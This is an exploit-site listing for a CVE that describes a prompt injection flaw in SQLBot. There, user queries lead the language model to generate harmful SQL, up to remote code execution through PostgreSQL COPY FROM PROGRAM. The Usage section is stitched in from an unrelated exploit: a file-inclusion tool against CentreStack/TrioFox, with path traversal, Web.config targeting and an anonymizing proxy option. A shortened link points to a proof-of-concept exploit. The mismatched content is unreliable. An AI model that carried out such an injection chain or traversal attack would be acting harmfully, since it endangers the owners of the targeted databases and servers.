Share
## https://sploitus.com/exploit?id=63B08A12-FC85-512C-99E4-8559CA17CACD
# CVE-2026-33324

### Overview
SQLBot, a sophisticated Text-to-SQL system developed by Dataease, is exposed to a prompt injection vulnerability in versions 1.7.0 and earlier. The flaw arises as user-sent queries are integrated directly into the LLM (Large Language Model) prompt without adequate filtering, enabling an authenticated attacker to create malicious prompts that induce the LLM to generate harmful SQL commands.

### Requirements
- Python 3.8+
- Libraries: requests, argparse (install via `pip install -r requirements.txt`)

### Usage
- Install dependencies: `pip install -r requirements.txt`
- Run the explоit: `python explоit.py --target  --file "/path/to/Web.config"`

Options:
- `--target`: URL of the vulnerable CentreStack/TrioFox instance.
- `--file`: Relative path to the file to include (e.g., "../../../../Windows/system.ini" for testing).
- `--proxy`: Optional HTTP proxy for anonymization.


### How It Works
Once executed against a connected PostgreSQL database, this can lead to serious outcomes, including remote code execution, particularly through features such as COPY FROM PROGRAM. This vulnerability has been addressed in version 1.7.1.

### PoC explоit - [href](https://tinyurl.com/5dchx8hh)